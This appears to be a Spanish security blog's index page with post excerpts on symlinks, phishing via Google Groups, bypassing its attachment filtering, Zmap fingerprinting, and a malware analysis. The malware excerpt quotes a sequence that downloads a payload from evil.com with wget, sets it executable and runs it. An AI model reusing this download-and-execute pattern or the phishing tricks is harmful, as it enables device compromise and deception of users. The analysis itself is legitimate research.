lunes, 15 de junio de 2015

El viejo truco del symlink

Symlinks y PHP

En los sistemas unix/linux, un "symlink" o "enlace simbólico" es un tipo de fichero que hace referencia a otro fichero o directorio. Esto tiene cierta utilidad para mantener una estructura determinada en el árbol de directorios  sin duplicar la información puesto que los symlinks no son copias sino simples enlaces o referencias.

Desde la consola de linux se puede crear un symlink con el siguiente comando:

$ ln -s /ruta/al/fichero nombre_symlink

Y desde PHP, usando función "symlink". Así:

symlink("/ruta/al/fichero", "nombre_symlink");


domingo, 8 de marzo de 2015

Evadir el filtrado de extensiones ejecutables en Google Groups

En el post anterior comentaba como hacer phishing con Google Groups usando los archivos adjuntos. Hoy veremos algo un poco más interesante }:]

Vaya por delante que lo expuesto en este post fue reportado al equipo de seguridad de Google y ellos concluyeron que o bien no se trata de un fallo de seguridad o su impacto es muy pequeño.

viernes, 27 de febrero de 2015

Vamos de pesca con Google Groups

Antes de empezar

Antes de continuar con la lectura de este post es necesario leer el siguiente hilo de mensajes en Google Groups a fin de contextualizar y comprender el resto de la entrada:

De pesca con Google Groups (primera parte)

sábado, 6 de diciembre de 2014

TCP Initial Window Size Fingerprinting with Zmap

¿Qué pasa cuando juntas una interesante técnica de fingerprinting con uno de los más rápidos scanners de Internet? Veamos... }:))

domingo, 19 de octubre de 2014

Set execution bit without chmod: A malware trick

Sucedió una vez, mientras analizaba por entretenimiento una muestra de malware para dispositivos embebidos, que encontré una secuencia de comandos bastante curiosa:

cd /var/run
cp /bin/cp evil
wget http://evil.com/evil -O evil
chmod +x evil
./evil

El propósito de cada línea, independientemente de las demás, está claro. Sin embargo, lo que me resultaba desconcertante era el comando "cp" ¿Para qué el malware crea una copia de "/bin/cp" si luego la sobrescribe inmediatamente?